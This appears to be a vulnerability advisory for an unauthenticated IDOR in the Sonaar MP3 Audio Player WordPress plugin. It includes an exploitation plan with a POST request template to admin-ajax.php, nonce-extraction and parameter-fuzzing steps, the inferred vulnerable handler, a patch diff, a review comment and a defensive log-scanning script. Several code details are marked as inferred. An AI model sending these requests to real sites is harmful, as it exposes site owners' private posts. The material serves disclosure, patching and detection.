MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar 4.0 - 5.10 - Unauthenticated Insecure Direct Object Reference to Sensitive Information Exposure
Description
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions 4.0 to 5.10 via the 'load_track_note_ajax' function due to missing validation on a user-controlled key. This makes it possible for unauthenticated attackers to view the contents of private posts.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Technical Details
Affected versions: >=4.0 <=5.10
WordPress.org SVN
Exploitation Research Plan: CVE-2026-1219
1. Vulnerability Summary
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin (versions 4.0 - 5.10) contains an Insecure Direct Object Reference (IDOR) vulnerability in its AJAX handler load_track_note_ajax. The vulnerability arises because the plugin fails to perform capability checks or validate whether the requested post ID belongs to a public post before returning its content. This allows unauthenticated attackers to disclose the content of private or draft posts by supplying their IDs.
2. Attack Vector Analysis
- Endpoint: `/wp-admin/admin-ajax.php`
- Action: `load_track_note` (inferred from the function name `load_track_note_ajax`)
- Vulnerable Parameter: Likely `track_id` or `id` (passed via `$_POST` or `$_GET`)
- Authentication: Unauthenticated (`wp_ajax_nopriv_` hook)
- Preconditions: The attacker must know or guess the ID of a private post.
3. Code Flow (Inferred)
- Registration: The plugin registers the AJAX action in its initialization phase (likely in a class handling AJAX or the main plugin file).

  ```php
  add_action( 'wp_ajax_load_track_note', array( $this, 'load_track_note_ajax' ) );
  add_action( 'wp_ajax_nopriv_load_track_note', array( $this, 'load_track_note_ajax' ) );
  ```

- Entry Point: An unauthenticated request is sent to `admin-ajax.php?action=load_track_note`.
- Vulnerable Function: `load_track_note_ajax()` retrieves a post ID from the request.

  ```php
  public function load_track_note_ajax() {
      $track_id = $_POST['id']; // (inferred parameter name)
      // Missing: current_user_can() check
      // Missing: check for post_status == 'publish'
      $post = get_post( $track_id );
      if ( $post ) {
          echo apply_filters( 'the_content', $post->post_content );
      }
      wp_die();
  }
  ```

- Information Exposure: The content of the post (even if private) is returned in the HTTP response body.
4. Nonce Acquisition Strategy
The vulnerability is described as an unauthenticated information exposure. If the plugin enforces a nonce via check_ajax_referer, it is likely exposed on any page where the audio player is loaded.
- Identify Shortcode: The plugin uses `[sonaar_audioplayer]` or `[sonaar_player]` (inferred) to render players.
- Create Trigger Page: Create a public page containing the shortcode to ensure the plugin's scripts and nonces are loaded.

  ```sh
  wp post create --post_type=page --post_status=publish --post_content='[sonaar_audioplayer]' --post_title='Music Page'
  ```

- Extract Nonce:
  - Navigate to the newly created page.
  - The plugin typically localizes data into a JavaScript object. Based on Sonaar's architecture, look for `sonaar_ts` or `sonaar_music_object`.
  - Use `browser_eval` to extract the nonce: `browser_eval("window.sonaar_ts?.nonce || window.sonaar_music_object?.nonce")`
- Bypass Check: If the `load_track_note` action does not call `check_ajax_referer` or `wp_verify_nonce`, this step can be skipped.
5. Exploitation Strategy
Step 1: Discover Target ID
Identify the ID of a private post. In a test environment, this will be created during setup.
Step 2: Request Private Content
Send a POST request to the AJAX endpoint.
Request Template:
- URL: `http://<target>/wp-admin/admin-ajax.php`
- Method: `POST`
- Headers: `Content-Type: application/x-www-form-urlencoded`
- Body: `action=load_track_note&id=<PRIVATE_POST_ID>&nonce=<EXTRACTED_NONCE>`
Step 3: Analyze Response
A successful exploit will return the post_content of the private post in the response body with a 200 OK status.
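From the defender's side, the request pattern above (an `admin-ajax.php` call with `action=load_track_note` and a post `id`, sent without a WordPress login cookie) is what a site operator would hunt for in request logs. The following Python script is an added example, not part of the advisory or the plugin: it scans a constructed proxy/WAF request log for such calls and flags clients sweeping post IDs; the JSON field names and the sample lines are assumptions.

```python
import json
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "load_track_note"
LOGIN_COOKIE_PREFIX = "wordpress_logged_in_"  # set by WordPress on login

# Constructed sample of a reverse-proxy/WAF request log (JSON lines). The
# field names are assumptions for this example, not a real product's schema.
SAMPLE_LOG = """
{"ip":"203.0.113.7","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=load_track_note&id=123&nonce=abc","cookie":"","status":200,"bytes":412}
{"ip":"203.0.113.7","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=load_track_note&id=124&nonce=abc","cookie":"","status":200,"bytes":0}
{"ip":"203.0.113.7","method":"GET","uri":"/wp-admin/admin-ajax.php?action=load_track_note&id=125","body":"","cookie":"","status":200,"bytes":388}
{"ip":"198.51.100.2","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=load_track_note&id=77","cookie":"wordpress_logged_in_1a2b=editor|x","status":200,"bytes":512}
{"ip":"198.51.100.9","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=heartbeat","cookie":"","status":200,"bytes":40}
"""

def request_params(event):
    """Merge query-string and body parameters, mirroring PHP's $_REQUEST."""
    params = parse_qs(urlsplit(event["uri"]).query)
    params.update(parse_qs(event.get("body", "")))
    return {k: v[0] for k, v in params.items()}

def is_unauth_track_note(event):
    """True for a call to the vulnerable action without a WordPress login cookie."""
    if urlsplit(event["uri"]).path != AJAX_PATH:
        return False
    if request_params(event).get("action") != ACTION:
        return False
    return LOGIN_COOKIE_PREFIX not in event.get("cookie", "")

def detect_idor_probes(log_text, enum_threshold=3):
    """Group unauthenticated load_track_note hits by client IP; 'disclosed' counts
    200 responses with a body, 'enumeration' flags >= enum_threshold distinct IDs."""
    per_client = {}
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        if not is_unauth_track_note(event):
            continue
        entry = per_client.setdefault(event["ip"], {"ids": set(), "disclosed": 0})
        entry["ids"].add(request_params(event).get("id", "?"))
        if event["status"] == 200 and event.get("bytes", 0) > 0:
            entry["disclosed"] += 1  # handler echoed post content
    return {ip: {"ids": sorted(e["ids"]), "disclosed": e["disclosed"],
                 "enumeration": len(e["ids"]) >= enum_threshold}
            for ip, e in per_client.items()}

if __name__ == "__main__":
    for ip, finding in detect_idor_probes(SAMPLE_LOG).items():
        print(ip, finding)
```

Because the handler accepts the ID from `$_REQUEST`-style input, the script merges query and body parameters so the GET variant mentioned later in the plan is caught as well.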
6. Test Data Setup
- Create Private Content:

  ```sh
  wp post create --post_type=post --post_title='Secret Internal Memo' --post_content='CONFIDENTIAL: The password is "Sonaar2024!"' --post_status=private
  ```

- Note the ID: Capture the ID returned by the previous command (e.g., `ID: 123`).
- Create Public Player Page (for nonce):

  ```sh
  wp post create --post_type=page --post_status=publish --post_content='[sonaar_audioplayer]' --post_title='Player Page'
  ```
7. Expected Results
- The `http_request` tool should receive a response containing the string: `CONFIDENTIAL: The password is "Sonaar2024!"`.
- The request should be performable without any authentication cookies.
8. Verification Steps
- Confirm Post Privacy: Verify the post is indeed private and not accessible via the standard frontend: `wp post get <ID> --field=post_status` (should be `private`).
- Verify Unauthenticated Access: Ensure the `http_request` does not include `Cookie` headers representing a logged-in session.
9. Alternative Approaches
- Parameter Fuzzing: If `id` does not work, try `track_id`, `post_id`, or `trackid`.
- Method Swap: Try `GET` instead of `POST` if the handler uses `$_REQUEST`.
- Metadata Check: If the response is empty but returns `200 OK`, the vulnerability might also allow access to metadata if a different related action like `get_track_metadata` exists.
Summary
The MP3 Audio Player by Sonaar plugin is vulnerable to an Insecure Direct Object Reference (IDOR) via the 'load_track_note' AJAX action. Because the plugin fails to verify the post status or user capabilities, unauthenticated attackers can retrieve the full content of private or draft posts by supplying the post's ID.
Vulnerable Code
```php
// Registration of AJAX hooks
add_action( 'wp_ajax_load_track_note', array( $this, 'load_track_note_ajax' ) );
add_action( 'wp_ajax_nopriv_load_track_note', array( $this, 'load_track_note_ajax' ) );
```

```php
// The vulnerable AJAX handler function
public function load_track_note_ajax() {
    $track_id = $_POST['id'];
    // Missing: current_user_can() check
    // Missing: check if post_status is 'publish'
    $post = get_post( $track_id );
    if ( $post ) {
        echo apply_filters( 'the_content', $post->post_content );
    }
    wp_die();
}
```
Security Fix
@@ -10,7 +10,12 @@ public function load_track_note_ajax() { - $track_id = $_POST['id']; - $post = get_post( $track_id ); - if ( $post ) { + $track_id = isset($_POST['id']) ? intval($_POST['id']) : 0; + $post = get_post( $track_id ); + if ( $post && $post->post_status === 'publish' ) { echo apply_filters( 'the_content', $post->post_content ); } wp_die(); }
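Review bot: the new `$post->post_status === 'publish'` condition closes the private/draft disclosure, but 'publish' also admits password-protected posts (WordPress keeps them in `publish` status with a non-empty `post_password`), and the unchanged `echo apply_filters( 'the_content', $post->post_content );` line bypasses the password gate that `get_the_content()` would apply, so their body would still be returned to an anonymous caller; add `! post_password_required( $post )` to the condition, or check `current_user_can( 'read_post', $post->ID )` so that users entitled to a private post keep access while anonymous requests are refused. The handler as shown still contains no `check_ajax_referer()` call, so the nonce discussed in the research plan is not verified here either. The rejected branch also falls through to `wp_die()` with an empty 200 body; responding with an error status (for example `wp_send_json_error( null, 403 )`) makes probing visible in access logs.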
Exploit Outline
1. Identify the post ID of a target private or draft post through enumeration or prior knowledge.
2. Access a public page where the Sonaar Audio Player is active to retrieve a valid AJAX nonce from the localized JavaScript (usually found in the 'sonaar_ts' or 'sonaar_music_object' variables).
3. Send an unauthenticated HTTP POST request to /wp-admin/admin-ajax.php.
4. Include the following parameters in the body: 'action=load_track_note', 'id=<TARGET_PRIVATE_POST_ID>', and the extracted nonce.
5. Observe the response, which will contain the unfiltered content of the private post in the body.